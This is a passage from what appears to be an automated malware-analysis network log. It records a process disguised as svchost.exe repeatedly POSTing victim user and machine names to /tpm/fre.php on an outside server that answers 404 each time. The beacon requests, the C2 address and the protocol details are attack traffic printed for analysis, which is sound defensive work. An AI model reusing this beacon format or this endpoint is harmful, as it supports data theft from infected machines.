Jan 7, 2025 11:03:12.127099037 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:12.613564014 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:12 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	50087	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:12.751332998 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:12.756186962 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:13.254630089 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:13 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	50088	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:13.394450903 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:13.399252892 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:13.969722986 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:13 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	50089	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:14.112335920 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:14.117177010 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:14.622642994 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:14 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	50090	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:14.766930103 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:14.771733999 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:15.287640095 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:15 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	50091	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:15.498904943 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:15.503726006 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:16.005959034 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:15 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	50092	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:16.141899109 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:16.146706104 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:16.664949894 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:16 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	50093	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:16.824640036 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:16.829443932 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:17.417833090 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:17 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	50094	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:17.566756010 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:17.571531057 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:18.071057081 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:17 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	50095	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:18.219871998 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:18.224687099 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:18.730529070 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:18 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	50096	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:18.876897097 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:18.881699085 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:19.380067110 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:19 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	50097	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:19.518410921 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:19.523284912 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:20.048472881 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:19 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	50098	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:20.191623926 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:20.196458101 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:20.702660084 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:20 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	50099	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:20.846611977 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:20.851457119 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:21.357232094 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:21 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	50100	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:21.502944946 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:21.507812977 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:21.997504950 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:21 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	50101	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:22.167857885 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:22.176021099 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:23.056798935 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:22 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	50102	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:23.208534956 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:23.213433981 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:24.002123117 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:23 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.5	50103	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:24.143870115 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:24.151005030 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:24.672724962 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:24 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	50104	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:24.819726944 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:24.824518919 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:26.567924023 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:25 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.5	50105	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:26.705790043 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:26.710639954 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:27.233051062 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:27 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	50106	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:27.375411034 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
